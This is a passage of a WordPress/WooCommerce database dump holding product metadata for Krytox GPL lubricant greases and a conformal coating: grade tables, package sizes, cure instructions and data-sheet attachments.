INSERT INTO `wp_postmeta` VALUES (7110, 790, '312_default_editor', '<table>\r\n<tbody>\r\n<tr>\r\n<td width="69">\r\n<p style="text-align: center;"><strong>GPL Standard Grades</strong></p>\r\n</td>\r\n<td style="text-align: center;" width="69"><strong>200</strong></td>\r\n<td style="text-align: center;" width="69"><strong>201</strong></td>\r\n<td style="text-align: center;" width="69"><strong>202</strong></td>\r\n<td style="text-align: center;" width="69"><strong>203</strong>\r\n\r\n<strong>(H-1 Certified)</strong></td>\r\n<td style="text-align: center;" width="69"><strong>204</strong></td>\r\n<td style="text-align: center;" width="69"><strong>205</strong>\r\n\r\n<strong>(H-1 Certified)</strong></td>\r\n<td style="text-align: center;" width="69"><strong>206</strong>\r\n\r\n<strong>(H-1 Certified)</strong></td>\r\n<td style="text-align: center;" width="69"><strong>207</strong></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="69"><strong>GPL Extreme Pressure Grades</strong></td>\r\n<td style="text-align: center;" width="69">210</td>\r\n<td style="text-align: center;" width="69">211</td>\r\n<td style="text-align: center;" width="69">212</td>\r\n<td style="text-align: center;" width="69">-</td>\r\n<td style="text-align: center;" width="69">214</td>\r\n<td style="text-align: center;" width="69">215</td>\r\n<td style="text-align: center;" width="69">216</td>\r\n<td style="text-align: center;" width="69">217</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="69"><strong>GPL Anti-Corrosion Grades</strong></td>\r\n<td style="text-align: center;" width="69">220</td>\r\n<td style="text-align: center;" width="69">221</td>\r\n<td style="text-align: center;" width="69">222</td>\r\n<td style="text-align: center;" width="69">223\r\n\r\n(H-1 Certified)</td>\r\n<td style="text-align: center;" width="69">224</td>\r\n<td style="text-align: center;" width="69">225\r\n\r\n(H-1 Certified)</td>\r\n<td style="text-align: center;" width="69">226\r\n\r\n(H-1 Certified)</td>\r\n<td style="text-align: center;" width="69">227</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="69"><strong>Oil Viscosity Index</strong></td>\r\n<td style="text-align: center;" width="69">-</td>\r\n<td style="text-align: center;" width="69">-</td>\r\n<td style="text-align: center;" width="69">29</td>\r\n<td style="text-align: center;" width="69">92</td>\r\n<td style="text-align: center;" width="69">111</td>\r\n<td style="text-align: center;" width="69">124</td>\r\n<td style="text-align: center;" width="69">134</td>\r\n<td style="text-align: center;" width="69">145</td>\r\n</tr>\r\n<tr>\r\n<td width="69">\r\n<p style="text-align: center;"><strong>Estimated Useful Range</strong></p>\r\n<p style="text-align: center;"><strong>°F</strong></p>\r\n</td>\r\n<td style="text-align: center;" width="69">-94-150</td>\r\n<td style="text-align: center;" width="69">-94-220</td>\r\n<td style="text-align: center;" width="69">-81-270</td>\r\n<td style="text-align: center;" width="69">-76-310</td>\r\n<td style="text-align: center;" width="69">-60-355</td>\r\n<td style="text-align: center;" width="69">-33-400</td>\r\n<td style="text-align: center;" width="69">-33-500</td>\r\n<td style="text-align: center;" width="69">-22-550</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (7111, 790, '317_default_editor', '<table>\r\n<tbody>\r\n<tr>\r\n<td width="125">Syringe</td>\r\n<td width="125">Tube</td>\r\n<td width="125">Jar</td>\r\n<td width="125">Cartridge</td>\r\n<td width="125">Pail</td>\r\n</tr>\r\n<tr>\r\n<td width="125">0.5 oz.</td>\r\n<td width="125">2 oz.</td>\r\n<td width="125">0.5 kg</td>\r\n<td width="125">0.8 kg</td>\r\n<td width="125">5 kg</td>\r\n</tr>\r\n<tr>\r\n<td width="125">1 oz.</td>\r\n<td width="125">-</td>\r\n<td width="125">1 kg</td>\r\n<td width="125"></td>\r\n<td width="125">7 kg</td>\r\n</tr>\r\n<tr>\r\n<td width="125">2 oz.</td>\r\n<td width="125">8 oz.</td>\r\n<td width="125"></td>\r\n<td width="125"></td>\r\n<td width="125">20 kg</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (7112, 790, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (7113, 790, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (7114, 790, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (7115, 790, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (7116, 790, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (7117, 790, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (7118, 790, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (7119, 790, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (7120, 790, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (7121, 790, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (7122, 790, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (7123, 790, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (7124, 790, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (7125, 790, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (7126, 790, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (7127, 790, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (7128, 790, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (7129, 790, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (7130, 790, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (7131, 790, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (7132, 790, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (7133, 790, '_product_version', '2.6.11'); 
INSERT INTO `wp_postmeta` VALUES (7134, 790, '_ywtm_hide_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (7135, 790, '_ywtm_override_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (7136, 790, '_ywtm_priority_tab_description', '1'); 
INSERT INTO `wp_postmeta` VALUES (7137, 790, '_ywtm_title_tab_description', 'Description'); 
INSERT INTO `wp_postmeta` VALUES (7138, 790, '_ywtm_content_tab_description', 'Krytox GPL 200–207 greases are white buttery greases with\r\nall of the same properties as the Krytox GPL 100–107 oils that\r\nthey are made from, but they are in grease form.\r\n\r\n&nbsp;\r\n\r\n<a href="https://www.miller-stephenson.com/wp-content/uploads/2016/08/GPL-PDF.pdf">GPL PDF</a>'); 
INSERT INTO `wp_postmeta` VALUES (7139, 790, '_ywtm_hide_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (7140, 790, '_ywtm_override_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (7141, 790, '_ywtm_priority_tab_reviews', '30'); 
INSERT INTO `wp_postmeta` VALUES (7142, 790, '_ywtm_title_tab_reviews', 'Reviews (%d)'); 
INSERT INTO `wp_postmeta` VALUES (7143, 790, '_product_image_gallery', '374,378,380,377,375,379,381'); 
INSERT INTO `wp_postmeta` VALUES (7144, 790, '318_custom_list_file', 'a:1:{s:32:"453f1230407deb37cf6bf4b3cd427c5e";a:3:{s:4:"name";s:20:"GPL Comparison Sheet";s:4:"file";s:72:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/GPL-PDF.pdf";s:4:"desc";s:20:"Technical Data Sheet";}}'); 
INSERT INTO `wp_postmeta` VALUES (7145, 790, '716_default_editor', '<ul>\r\n 	<li>Bearings</li>\r\n 	<li>O-Rings</li>\r\n 	<li>Valves</li>\r\n 	<li>Hinges</li>\r\n 	<li>Handles</li>\r\n 	<li>Moving Parts</li>\r\n 	<li>Seals</li>\r\n 	<li>Connectors</li>\r\n 	<li>Rollers</li>\r\n 	<li>Automotive Interiors</li>\r\n 	<li>Fittings</li>\r\n 	<li>Gearbox</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (7146, 790, '719_default_editor', '<ul>\r\n 	<li>ASTM D2595</li>\r\n 	<li>ASTM D6184</li>\r\n 	<li>NSF H-1 Rated</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (7169, 736, '_wc_review_count', '0'); 
INSERT INTO `wp_postmeta` VALUES (7170, 792, '_wp_attached_file', '2016/08/shutterstock_147750545.jpg'); 
INSERT INTO `wp_postmeta` VALUES (7171, 792, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:4928;s:6:"height";i:3264;s:4:"file";s:34:"2016/08/shutterstock_147750545.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:34:"shutterstock_147750545-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:34:"shutterstock_147750545-800x530.jpg";s:5:"width";i:800;s:6:"height";i:530;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:34:"shutterstock_147750545-768x509.jpg";s:5:"width";i:768;s:6:"height";i:509;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:36:"shutterstock_147750545-1600x1060.jpg";s:5:"width";i:1600;s:6:"height";i:1060;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_147750545-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_147750545-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:34:"shutterstock_147750545-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:34:"shutterstock_147750545-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"3";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (7172, 793, '_wp_attached_file', '2016/08/shutterstock_230407642.jpg'); 
INSERT INTO `wp_postmeta` VALUES (7173, 793, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:4288;s:6:"height";i:2848;s:4:"file";s:34:"2016/08/shutterstock_230407642.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:34:"shutterstock_230407642-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:34:"shutterstock_230407642-800x531.jpg";s:5:"width";i:800;s:6:"height";i:531;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:34:"shutterstock_230407642-768x510.jpg";s:5:"width";i:768;s:6:"height";i:510;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:36:"shutterstock_230407642-1600x1063.jpg";s:5:"width";i:1600;s:6:"height";i:1063;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_230407642-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_230407642-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:34:"shutterstock_230407642-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:34:"shutterstock_230407642-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"3";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (7174, 794, '_wp_attached_file', '2016/08/shutterstock_283795469.jpg'); 
INSERT INTO `wp_postmeta` VALUES (7175, 794, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:4288;s:6:"height";i:2848;s:4:"file";s:34:"2016/08/shutterstock_283795469.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:34:"shutterstock_283795469-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:34:"shutterstock_283795469-800x531.jpg";s:5:"width";i:800;s:6:"height";i:531;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:34:"shutterstock_283795469-768x510.jpg";s:5:"width";i:768;s:6:"height";i:510;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:36:"shutterstock_283795469-1600x1063.jpg";s:5:"width";i:1600;s:6:"height";i:1063;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_283795469-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_283795469-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:34:"shutterstock_283795469-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:34:"shutterstock_283795469-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"1";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (7176, 795, '_wp_attached_file', '2016/08/shutterstock_389250415.jpg'); 
INSERT INTO `wp_postmeta` VALUES (7177, 795, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5715;s:6:"height";i:3815;s:4:"file";s:34:"2016/08/shutterstock_389250415.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:34:"shutterstock_389250415-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:34:"shutterstock_389250415-800x534.jpg";s:5:"width";i:800;s:6:"height";i:534;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:34:"shutterstock_389250415-768x513.jpg";s:5:"width";i:768;s:6:"height";i:513;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:36:"shutterstock_389250415-1600x1068.jpg";s:5:"width";i:1600;s:6:"height";i:1068;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_389250415-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_389250415-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:34:"shutterstock_389250415-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:34:"shutterstock_389250415-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"2";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (7178, 796, '_wp_attached_file', '2016/08/shutterstock_448241593.jpg'); 
INSERT INTO `wp_postmeta` VALUES (7179, 796, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:4496;s:6:"height";i:3000;s:4:"file";s:34:"2016/08/shutterstock_448241593.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:34:"shutterstock_448241593-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:34:"shutterstock_448241593-800x534.jpg";s:5:"width";i:800;s:6:"height";i:534;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:34:"shutterstock_448241593-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:36:"shutterstock_448241593-1600x1068.jpg";s:5:"width";i:1600;s:6:"height";i:1068;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_448241593-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_448241593-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:34:"shutterstock_448241593-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:34:"shutterstock_448241593-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"1";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (7180, 790, '_thumbnail_id', '796'); 
INSERT INTO `wp_postmeta` VALUES (7181, 190, '312_default_editor', '<strong>Cure Electrical Properties</strong>\r\n<table width="378">\r\n<tbody>\r\n<tr>\r\n<td width="242">Dielectric Withstand Voltage, Volts</td>\r\n<td width="136">&gt;1500</td>\r\n</tr>\r\n<tr>\r\n<td>Dielectric Constant @ 1 MHz (77F/25C)</td>\r\n<td>3.5</td>\r\n</tr>\r\n<tr>\r\n<td>Dissipation Factor @ 1 MHz (77F/25C)</td>\r\n<td>0.028</td>\r\n</tr>\r\n<tr>\r\n<td>Insulation Resistance, ohms</td>\r\n<td>3.0 x 10^14</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong>Cured Physical Properties</strong>\r\n\r\n<strong>Operating Temperature: </strong>-85°F/-65°C to 257°F/125°C\r\n<strong>Appearance:</strong> No blistering, wrinkling, cracking, or peeling of film, discoloration of printed conductors or substrate after thermal shock, or after moisture resistance testing.\r\n<strong>Flexibility:</strong> No cracking or crazing of film on bending over a 3 mm diameter mandrel.\r\n<strong>Fluorescent:</strong> when viewed with ultraviolet light.'); 
INSERT INTO `wp_postmeta` VALUES (7182, 190, '716_default_editor', 'Allow 48 hours minimum to reach room temperature before using cans stored or received during cold weather.\r\n\r\nPost Application: Air dry for 30 minutes. Repeat up to 2-3 coats. The recommended cure schedule is 2 hours at 140°F/60°C and a relative humidity of 30% to 50%.  If the humidity level is less than 30%, place an open container of distilled water in the oven and allow to equilibrate.  The alternate cure, at room temperature and a relative humidity of 30% to 50%, will be tack free in one to four hours, semi-hard in one day, and fully cured in seven days.'); 
INSERT INTO `wp_postmeta` VALUES (7183, 190, '719_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (7184, 190, '317_default_editor', '14 oz Aerosol'); 
INSERT INTO `wp_postmeta` VALUES (7185, 190, '_ywtm_hide_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (7186, 190, '_ywtm_override_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (7187, 190, '_ywtm_priority_tab_description', '10'); 
INSERT INTO `wp_postmeta` VALUES (7188, 190, '_ywtm_title_tab_description', 'Description'); 
INSERT INTO `wp_postmeta` VALUES (7189, 190, '_ywtm_content_tab_description', '[row]\r\n\r\n[col span="1/1"]\r\n\r\n[product id="#" sku="#"]\r\n\r\n[/col]\r\n\r\n[/row]'); 
INSERT INTO `wp_postmeta` VALUES (7190, 190, '_ywtm_hide_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (7191, 190, '_ywtm_override_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (7192, 190, '_ywtm_priority_tab_reviews', '30'); 
INSERT INTO `wp_postmeta` VALUES (7193, 190, '_ywtm_title_tab_reviews', 'Reviews (%d)'); 
INSERT INTO `wp_postmeta` VALUES (7194, 797, '_wp_attached_file', '2016/08/240.pdf'); 
INSERT INTO `wp_postmeta` VALUES (7195, 798, '_wp_attached_file', '2016/08/283.pdf'); 
INSERT INTO `wp_postmeta` VALUES (7196, 799, '_wp_attached_file', '2016/08/AUT2A45.pdf'); 
INSERT INTO `wp_postmeta` VALUES (7197, 800, '_wp_attached_file', '2016/08/AUT2045.pdf'); 
INSERT INTO `wp_postmeta` VALUES (7198, 801, '_wp_attached_file', '2016/08/AUT2245.pdf'); 
INSERT INTO `wp_postmeta` VALUES (7199, 802, '_wp_attached_file', '2016/08/FPG.pdf'); 
INSERT INTO `wp_postmeta` VALUES (7200, 803, '_wp_attached_file', '2016/08/GPL10X.pdf'); 
INSERT INTO `wp_postmeta` VALUES (7201, 804, '_wp_attached_file', '2016/08/GPL20X.pdf'); 
INSERT INTO `wp_postmeta` VALUES (7202, 805, '_wp_attached_file', '2016/08/GPL21X.pdf'); 
INSERT INTO `wp_postmeta` VALUES (7203, 806, '_wp_attached_file', '2016/08/GPL22X.pdf'); 
INSERT INTO `wp_postmeta` VALUES (7204, 807, '_wp_attached_file', '2016/08/Krytox250.pdf'); 
INSERT INTO `wp_postmeta` VALUES (7205, 808, '_wp_attached_file', '2016/08/Krytox280.pdf'); 
INSERT INTO `wp_postmeta` VALUES (7206, 809, '_wp_attached_file', '2016/08/LVP.pdf'); 
INSERT INTO `wp_postmeta` VALUES (7207, 810, '_wp_attached_file', '2016/08/VPF.pdf'); 
INSERT INTO `wp_postmeta` VALUES (7208, 811, '_wp_attached_file', '2016/08/XHTAC.pdf'); 
INSERT INTO `wp_postmeta` VALUES (7209, 812, '_wp_attached_file', '2016/08/XHTBD.pdf'); 
INSERT INTO `wp_postmeta` VALUES (7210, 813, '_wp_attached_file', '2016/08/XHTS.pdf'); 
INSERT INTO `wp_postmeta` VALUES (7211, 790, '_wc_review_count', '0'); 
INSERT INTO `wp_postmeta` VALUES (7212, 790, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (7213, 790, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (7214, 814, '_edit_lock', '1487970070:2'); 
INSERT INTO `wp_postmeta` VALUES (7215, 814, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (7216, 814, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (7217, 814, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (7218, 814, '312_default_editor', '<table>\r\n<tbody>\r\n<tr>\r\n<td width="69">\r\n<p style="text-align: center;"><strong>GPL Standard Grades</strong></p>\r\n</td>\r\n<td style="text-align: center;" width="69"><strong>200</strong></td>\r\n<td style="text-align: center;" width="69"><strong>201</strong></td>\r\n<td style="text-align: center;" width="69"><strong>202</strong></td>\r\n<td style="text-align: center;" width="69"><strong>203</strong>\r\n\r\n<strong>(H-1 Certified)</strong></td>\r\n<td style="text-align: center;" width="69"><strong>204</strong></td>\r\n<td style="text-align: center;" width="69"><strong>205</strong>\r\n\r\n<strong>(H-1 Certified)</strong></td>\r\n<td style="text-align: center;" width="69"><strong>206</strong>\r\n\r\n<strong>(H-1 Certified)</strong></td>\r\n<td style="text-align: center;" width="69"><strong>207</strong></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="69"><strong>GPL Extreme Pressure Grades</strong></td>\r\n<td style="text-align: center;" width="69">210</td>\r\n<td style="text-align: center;" width="69">211</td>\r\n<td style="text-align: center;" width="69">212</td>\r\n<td style="text-align: center;" width="69">-</td>\r\n<td style="text-align: center;" width="69">214</td>\r\n<td style="text-align: center;" width="69">215</td>\r\n<td style="text-align: center;" width="69">216</td>\r\n<td style="text-align: center;" width="69">217</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="69"><strong>GPL Anti-Corrosion Grades</strong></td>\r\n<td style="text-align: center;" width="69">220</td>\r\n<td style="text-align: center;" width="69">221</td>\r\n<td style="text-align: center;" width="69">222</td>\r\n<td style="text-align: center;" width="69">223\r\n\r\n(H-1 Certified)</td>\r\n<td style="text-align: center;" width="69">224</td>\r\n<td style="text-align: center;" width="69">225\r\n\r\n(H-1 Certified)</td>\r\n<td style="text-align: center;" width="69">226\r\n\r\n(H-1 Certified)</td>\r\n<td style="text-align: center;" width="69">227</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="69"><strong>Oil Viscosity Index</strong></td>\r\n<td style="text-align: center;" width="69">-</td>\r\n<td style="text-align: center;" width="69">-</td>\r\n<td style="text-align: center;" width="69">29</td>\r\n<td style="text-align: center;" width="69">92</td>\r\n<td style="text-align: center;" width="69">111</td>\r\n<td style="text-align: center;" width="69">124</td>\r\n<td style="text-align: center;" width="69">134</td>\r\n<td style="text-align: center;" width="69">145</td>\r\n</tr>\r\n<tr>\r\n<td width="69">\r\n<p style="text-align: center;"><strong>Estimated Useful Range</strong></p>\r\n<p style="text-align: center;"><strong>°F</strong></p>\r\n</td>\r\n<td style="text-align: center;" width="69">-94-150</td>\r\n<td style="text-align: center;" width="69">-94-220</td>\r\n<td style="text-align: center;" width="69">-81-270</td>\r\n<td style="text-align: center;" width="69">-76-310</td>\r\n<td style="text-align: center;" width="69">-60-355</td>\r\n<td style="text-align: center;" width="69">-33-400</td>\r\n<td style="text-align: center;" width="69">-33-500</td>\r\n<td style="text-align: center;" width="69">-22-550</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (7219, 814, '317_default_editor', '<table>\r\n<tbody>\r\n<tr>\r\n<td width="125">Syringe</td>\r\n<td width="125">Tube</td>\r\n<td width="125">Jar</td>\r\n<td width="125">Cartridge</td>\r\n<td width="125">Pail</td>\r\n</tr>\r\n<tr>\r\n<td width="125">0.5 oz.</td>\r\n<td width="125">2 oz.</td>\r\n<td width="125">0.5 kg</td>\r\n<td width="125">0.8 kg</td>\r\n<td width="125">5 kg</td>\r\n</tr>\r\n<tr>\r\n<td width="125">1 oz.</td>\r\n<td width="125">-</td>\r\n<td width="125">1 kg</td>\r\n<td width="125"></td>\r\n<td width="125">7 kg</td>\r\n</tr>\r\n<tr>\r\n<td width="125">2 oz.</td>\r\n<td width="125">8 oz.</td>\r\n<td width="125"></td>\r\n<td width="125"></td>\r\n<td width="125">20 kg</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (7220, 814, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (7221, 814, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (7222, 814, '_virtual', 'no'); 
